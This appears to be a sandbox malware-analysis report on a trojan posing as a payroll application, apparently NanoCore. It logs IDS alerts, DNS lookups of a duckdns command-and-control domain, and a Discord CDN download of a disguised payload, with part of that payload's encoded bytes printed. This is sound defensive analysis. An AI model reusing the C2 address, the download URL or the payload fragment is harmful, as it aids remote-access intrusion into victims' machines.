                .rsrc0x2e0000x6280x800False0.322265625data3.45903901405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x300000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_VERSION0x2e0a00x39cdata
                RT_MANIFEST0x2e43c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Version Infos

                DescriptionData
                Translation0x0000 0x04b0
                LegalCopyrightCopyright 2013
                Assembly Version1.0.0.0
                InternalNamePayroll Management System.exe
                FileVersion1.0.0.0
                CompanyName
                LegalTrademarks
                Comments
                ProductNamePayroll Management System
                ProductVersion1.0.0.0
                FileDescriptionPayroll Management System
                OriginalFilenamePayroll Management System.exe

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                10/27/21-03:03:12.789428UDP254DNS SPOOF query response with TTL of 1 min. and no authority53640218.8.8.8192.168.2.3
                10/27/21-03:03:13.217886TCP2025019ET TROJAN Possible NanoCore C2 60B497168655192.168.2.345.133.1.211
                10/27/21-03:03:19.480923UDP254DNS SPOOF query response with TTL of 1 min. and no authority53607848.8.8.8192.168.2.3
                10/27/21-03:03:19.528116TCP2025019ET TROJAN Possible NanoCore C2 60B497178655192.168.2.345.133.1.211
                10/27/21-03:03:27.954322TCP2025019ET TROJAN Possible NanoCore C2 60B497218655192.168.2.345.133.1.211
                10/27/21-03:03:34.917522UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521308.8.8.8192.168.2.3
                10/27/21-03:03:35.195298TCP2025019ET TROJAN Possible NanoCore C2 60B497248655192.168.2.345.133.1.211
                10/27/21-03:03:42.169713UDP254DNS SPOOF query response with TTL of 1 min. and no authority53551028.8.8.8192.168.2.3
                10/27/21-03:03:42.273247TCP2025019ET TROJAN Possible NanoCore C2 60B497258655192.168.2.345.133.1.211
                10/27/21-03:03:48.955141UDP254DNS SPOOF query response with TTL of 1 min. and no authority53562368.8.8.8192.168.2.3
                10/27/21-03:03:49.064793TCP2025019ET TROJAN Possible NanoCore C2 60B497268655192.168.2.345.133.1.211
                10/27/21-03:03:58.273963UDP254DNS SPOOF query response with TTL of 1 min. and no authority53632978.8.8.8192.168.2.3
                10/27/21-03:03:58.302420TCP2025019ET TROJAN Possible NanoCore C2 60B497308655192.168.2.345.133.1.211
                10/27/21-03:04:05.421907TCP2025019ET TROJAN Possible NanoCore C2 60B497658655192.168.2.345.133.1.211
                10/27/21-03:04:12.438122UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505858.8.8.8192.168.2.3
                10/27/21-03:04:12.470134TCP2025019ET TROJAN Possible NanoCore C2 60B497748655192.168.2.345.133.1.211
                10/27/21-03:04:20.373141UDP254DNS SPOOF query response with TTL of 1 min. and no authority53634568.8.8.8192.168.2.3
                10/27/21-03:04:20.402976TCP2025019ET TROJAN Possible NanoCore C2 60B497768655192.168.2.345.133.1.211
                10/27/21-03:04:27.364976UDP254DNS SPOOF query response with TTL of 1 min. and no authority53585408.8.8.8192.168.2.3
                10/27/21-03:04:27.441181TCP2025019ET TROJAN Possible NanoCore C2 60B497938655192.168.2.345.133.1.211
                10/27/21-03:04:34.892892TCP2025019ET TROJAN Possible NanoCore C2 60B498028655192.168.2.345.133.1.211
                10/27/21-03:04:41.785895TCP2025019ET TROJAN Possible NanoCore C2 60B498048655192.168.2.345.133.1.211
                10/27/21-03:04:48.238483UDP254DNS SPOOF query response with TTL of 1 min. and no authority53492508.8.8.8192.168.2.3
                10/27/21-03:04:48.608358TCP2025019ET TROJAN Possible NanoCore C2 60B498058655192.168.2.345.133.1.211
                10/27/21-03:04:55.682456UDP254DNS SPOOF query response with TTL of 1 min. and no authority53634908.8.8.8192.168.2.3
                10/27/21-03:04:55.712891TCP2025019ET TROJAN Possible NanoCore C2 60B498068655192.168.2.345.133.1.211
                10/27/21-03:05:02.400161TCP2025019ET TROJAN Possible NanoCore C2 60B498078655192.168.2.345.133.1.211
                10/27/21-03:05:09.297215TCP2025019ET TROJAN Possible NanoCore C2 60B498088655192.168.2.345.133.1.211

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 27, 2021 03:03:07.294363022 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:07.294405937 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:07.294522047 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:07.318180084 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:07.318233013 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:07.369452953 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:07.369673967 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:07.380558014 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:07.380573034 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:07.380913019 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:07.420223951 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:07.781847000 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:07.823144913 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.152241945 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.152400970 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.152475119 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.152482033 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.152503967 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.152563095 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.152589083 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.152702093 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.152757883 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.152765036 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.152782917 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.152832031 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.152844906 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.153044939 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.153096914 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.153103113 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.153120995 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.153173923 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.153295040 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.153398037 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.153464079 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.153474092 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.153492928 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.153563023 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.154231071 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.154344082 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.154416084 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.154418945 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.154438972 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.154486895 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.154500961 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.155214071 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.155266047 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.155283928 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.155452013 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.155503035 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.155513048 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.168632984 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.168705940 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.168706894 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.168730021 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.168778896 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.168790102 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.168898106 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.168946028 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.168956041 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.169024944 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.169074059 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.169084072 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.169142962 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.169189930 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.169198990 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.169900894 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.169956923 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.169967890 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.170032024 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.170078993 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.170087099 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.170679092 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.170732021 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.170742989 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.171715021 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.171792984 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.171804905 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.171829939 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.171879053 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.171890974 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.171940088 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.171947956 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.172933102 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.173012972 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.173031092 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.173082113 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.173487902 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.173580885 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.173826933 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.173897028 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.174499989 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.174575090 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.174781084 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.174851894 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.175378084 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.175453901 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.176076889 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.176156044 CEST49715443192.168.2.3162.159.129.233
                Oct 27, 2021 03:03:08.185286045 CEST44349715162.159.129.233192.168.2.3
                Oct 27, 2021 03:03:08.185379028 CEST49715443192.168.2.3162.159.129.233

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 27, 2021 03:03:07.239691019 CEST5391053192.168.2.38.8.8.8
                Oct 27, 2021 03:03:07.260812998 CEST53539108.8.8.8192.168.2.3
                Oct 27, 2021 03:03:12.676012993 CEST6402153192.168.2.38.8.8.8
                Oct 27, 2021 03:03:12.789427996 CEST53640218.8.8.8192.168.2.3
                Oct 27, 2021 03:03:19.367018938 CEST6078453192.168.2.38.8.8.8
                Oct 27, 2021 03:03:19.480922937 CEST53607848.8.8.8192.168.2.3
                Oct 27, 2021 03:03:25.574836016 CEST5114353192.168.2.38.8.8.8
                Oct 27, 2021 03:03:25.595724106 CEST53511438.8.8.8192.168.2.3
                Oct 27, 2021 03:03:27.888731003 CEST5902653192.168.2.38.8.8.8
                Oct 27, 2021 03:03:27.907144070 CEST53590268.8.8.8192.168.2.3
                Oct 27, 2021 03:03:34.803560019 CEST5213053192.168.2.38.8.8.8
                Oct 27, 2021 03:03:34.917521954 CEST53521308.8.8.8192.168.2.3
                Oct 27, 2021 03:03:42.055043936 CEST5510253192.168.2.38.8.8.8
                Oct 27, 2021 03:03:42.169713020 CEST53551028.8.8.8192.168.2.3
                Oct 27, 2021 03:03:48.842617989 CEST5623653192.168.2.38.8.8.8
                Oct 27, 2021 03:03:48.955141068 CEST53562368.8.8.8192.168.2.3
                Oct 27, 2021 03:03:58.160204887 CEST6329753192.168.2.38.8.8.8
                Oct 27, 2021 03:03:58.273962975 CEST53632978.8.8.8192.168.2.3
                Oct 27, 2021 03:04:05.158982992 CEST5153953192.168.2.38.8.8.8
                Oct 27, 2021 03:04:05.177237988 CEST53515398.8.8.8192.168.2.3
                Oct 27, 2021 03:04:12.326107979 CEST5058553192.168.2.38.8.8.8
                Oct 27, 2021 03:04:12.438122034 CEST53505858.8.8.8192.168.2.3
                Oct 27, 2021 03:04:20.259135008 CEST6345653192.168.2.38.8.8.8
                Oct 27, 2021 03:04:20.373141050 CEST53634568.8.8.8192.168.2.3
                Oct 27, 2021 03:04:27.251183987 CEST5854053192.168.2.38.8.8.8
                Oct 27, 2021 03:04:27.364975929 CEST53585408.8.8.8192.168.2.3
                Oct 27, 2021 03:04:34.581033945 CEST5510853192.168.2.38.8.8.8
                Oct 27, 2021 03:04:34.601500034 CEST53551088.8.8.8192.168.2.3
                Oct 27, 2021 03:04:41.737194061 CEST6443253192.168.2.38.8.8.8
                Oct 27, 2021 03:04:41.755405903 CEST53644328.8.8.8192.168.2.3
                Oct 27, 2021 03:04:48.125134945 CEST4925053192.168.2.38.8.8.8
                Oct 27, 2021 03:04:48.238482952 CEST53492508.8.8.8192.168.2.3
                Oct 27, 2021 03:04:55.556725025 CEST6349053192.168.2.38.8.8.8
                Oct 27, 2021 03:04:55.682456017 CEST53634908.8.8.8192.168.2.3
                Oct 27, 2021 03:05:02.351448059 CEST6511053192.168.2.38.8.8.8
                Oct 27, 2021 03:05:02.370592117 CEST53651108.8.8.8192.168.2.3
                Oct 27, 2021 03:05:09.249598026 CEST6112053192.168.2.38.8.8.8
                Oct 27, 2021 03:05:09.268933058 CEST53611208.8.8.8192.168.2.3

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Oct 27, 2021 03:03:07.239691019 CEST192.168.2.38.8.8.80x6a8eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                Oct 27, 2021 03:03:12.676012993 CEST192.168.2.38.8.8.80x3005Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:03:19.367018938 CEST192.168.2.38.8.8.80xf996Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:03:25.574836016 CEST192.168.2.38.8.8.80x7f13Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                Oct 27, 2021 03:03:27.888731003 CEST192.168.2.38.8.8.80x939bStandard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:03:34.803560019 CEST192.168.2.38.8.8.80x3f7eStandard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:03:42.055043936 CEST192.168.2.38.8.8.80xdbcStandard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:03:48.842617989 CEST192.168.2.38.8.8.80x9e39Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:03:58.160204887 CEST192.168.2.38.8.8.80xd0b8Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:04:05.158982992 CEST192.168.2.38.8.8.80x3241Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:04:12.326107979 CEST192.168.2.38.8.8.80x9908Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:04:20.259135008 CEST192.168.2.38.8.8.80xff10Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:04:27.251183987 CEST192.168.2.38.8.8.80x9ddStandard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:04:34.581033945 CEST192.168.2.38.8.8.80x533Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:04:41.737194061 CEST192.168.2.38.8.8.80xa7f6Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:04:48.125134945 CEST192.168.2.38.8.8.80x8733Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:04:55.556725025 CEST192.168.2.38.8.8.80x610aStandard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:05:02.351448059 CEST192.168.2.38.8.8.80xbb8aStandard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
                Oct 27, 2021 03:05:09.249598026 CEST192.168.2.38.8.8.80x8857Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Oct 27, 2021 03:03:07.260812998 CEST8.8.8.8192.168.2.30x6a8eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:07.260812998 CEST8.8.8.8192.168.2.30x6a8eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:07.260812998 CEST8.8.8.8192.168.2.30x6a8eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:07.260812998 CEST8.8.8.8192.168.2.30x6a8eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:07.260812998 CEST8.8.8.8192.168.2.30x6a8eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:12.789427996 CEST8.8.8.8192.168.2.30x3005No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:19.480922937 CEST8.8.8.8192.168.2.30xf996No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:25.595724106 CEST8.8.8.8192.168.2.30x7f13No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:25.595724106 CEST8.8.8.8192.168.2.30x7f13No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:25.595724106 CEST8.8.8.8192.168.2.30x7f13No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:25.595724106 CEST8.8.8.8192.168.2.30x7f13No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:25.595724106 CEST8.8.8.8192.168.2.30x7f13No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:27.907144070 CEST8.8.8.8192.168.2.30x939bNo error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:29.073473930 CEST8.8.8.8192.168.2.30x18b0No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                Oct 27, 2021 03:03:34.917521954 CEST8.8.8.8192.168.2.30x3f7eNo error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:42.169713020 CEST8.8.8.8192.168.2.30xdbcNo error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:48.955141068 CEST8.8.8.8192.168.2.30x9e39No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:03:58.273962975 CEST8.8.8.8192.168.2.30xd0b8No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:04:05.177237988 CEST8.8.8.8192.168.2.30x3241No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:04:12.438122034 CEST8.8.8.8192.168.2.30x9908No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:04:20.373141050 CEST8.8.8.8192.168.2.30xff10No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:04:27.364975929 CEST8.8.8.8192.168.2.30x9ddNo error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:04:34.601500034 CEST8.8.8.8192.168.2.30x533No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:04:41.755405903 CEST8.8.8.8192.168.2.30xa7f6No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:04:48.238482952 CEST8.8.8.8192.168.2.30x8733No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:04:55.682456017 CEST8.8.8.8192.168.2.30x610aNo error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:05:02.370592117 CEST8.8.8.8192.168.2.30xbb8aNo error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)
                Oct 27, 2021 03:05:09.268933058 CEST8.8.8.8192.168.2.30x8857No error (0)zeegod.duckdns.org45.133.1.211A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • cdn.discordapp.com

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.349715162.159.129.233443C:\Users\user\Desktop\eReceiptpdf.exe
                TimestampkBytes transferredDirectionData
                2021-10-27 01:03:07 UTC0OUTGET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1
                Host: cdn.discordapp.com
                Connection: Keep-Alive
                2021-10-27 01:03:08 UTC0INHTTP/1.1 200 OK
                Date: Wed, 27 Oct 2021 01:03:08 GMT
                Content-Type: image/jpeg
                Content-Length: 976828
                Connection: close
                CF-Ray: 6a4800b9ae585c32-FRA
                Accept-Ranges: bytes
                Cache-Control: public, max-age=31536000
                ETag: "be30f5911bc96f37b49a11905d15afac"
                Expires: Thu, 27 Oct 2022 01:03:08 GMT
                Last-Modified: Tue, 26 Oct 2021 20:23:59 GMT
                Vary: Accept-Encoding
                CF-Cache-Status: MISS
                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                x-goog-generation: 1635279839570116
                x-goog-hash: crc32c=xGchCA==
                x-goog-hash: md5=vjD1kRvJbze0mhGQXRWvrA==
                x-goog-metageneration: 1
                x-goog-storage-class: STANDARD
                x-goog-stored-content-encoding: identity
                x-goog-stored-content-length: 976828
                X-GUploader-UploadID: ADPycduDNcNKudAcRz6osKTk_KjWwpIcT_kNR8UJ2V--3Z8m0poOiEMI9P_muZLQC_1wabNpP26rayGI7bwnkyAWlSI
                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X5T07TEmxOms29tzvpsa22nV%2BBmQ3L8Porj5NrLbEdXq0JlyypQyf9zQ%2FE2ukwW5eWSb6k0tDjNMJYZrrGwYVSuGWEOK12f2mSbMUgdMw2TLTwO6e82QL2Pml326qP5LXn%2FbPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                2021-10-27 01:03:08 UTC1INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                Data Ascii: Server: cloudflare
                2021-10-27 01:03:08 UTC1INData Raw: 68 71 65 6a 78 63 49 77 70 4f 2d 77 77 20 4f 68 20 71 78 78 20 68 20 6a 20 68 20 68 20 68 20 78 20 68 20 68 20 68 20 65 63 63 20 65 63 63 20 68 20 68 20 71 70 78 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 49 78 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 71 65 70 20 68 20 68 20 68 20 71 78 20 6a 71 20 71 70 49 20 71 78 20 68 20 71 70 68 20 4f 20 65 68 63 20 6a 6a 20 71 70 78 20 71 20 77 49 20 65 68 63 20 6a 6a 20 70 78 20 71 68 78 20 71 68 63 20 71 71 63 20 6a 65 20 71 71 65 20 71 71 78 20 71 71 71 20 71 68 6a 20 71 71 78 20 4f 77 20 71 68 4f 20 6a 65 20 4f 4f 20 4f 77 20 71 71 68 20 71
                Data Ascii: hqejxcIwpO-ww Oh qxx h j h h h x h h h ecc ecc h h qpx h h h h h h h Ix h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h qep h h h qx jq qpI qx h qph O ehc jj qpx q wI ehc jj px qhx qhc qqc je qqe qqx qqq qhj qqx Ow qhO je OO Ow qqh q
                2021-10-27 01:03:08 UTC2INData Raw: 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 65 63 20 78 68 20 65 65 4f 20 71 68 4f 20 71 71 63 20 63 68 20 78 70 20 63 68 20 63 68 20 70 78 20 71 71 78 20 71 71 77 20 71 78 49 20 71 78 6a 20 63 68 20 78 70 20 71 6a 70 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 71 65 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 77 49 20
                Data Ascii: h h h h h h h h h h h h h h h h h h h h h ec xh eeO qhO qqc ch xp ch ch px qqx qqw qxI qxj ch xp qjp cx px qqx qqw qhO qqe ch qqe ch cx px qqx qqw qhO qqe ch xp ch cx px qqx qqw qhO qqe ch xp ch cx px qqx qqw qhO qqe ch xp ch cx px qqx qqw qhO qqe ch qwI
                2021-10-27 01:03:08 UTC4INData Raw: 63 68 20 65 78 70 20 63 71 20 63 78 20 70 78 20 71 71 65 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 71 70 20 63 78 20 70 78 20 71 70 20 4f 71 20 6a 71 20 65 71 20 4f 78 20 4f 63 20 70 71 20 63 78 20 70 78 20 71 65 49 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 78 70 20 63 78 20 70 78 20 71 71 65 20 71 71 77 20 71 68 4f 20 71 71 65 20 65 78 70 20 78 4f 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 63 6a 20 71 68 4f 20 71 71 65 20 71 71 65 20 6a 68 20 49 78 20 49 4f 20 6a 70 20 71 77 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 70 20 77 49 20 63 71 20 63
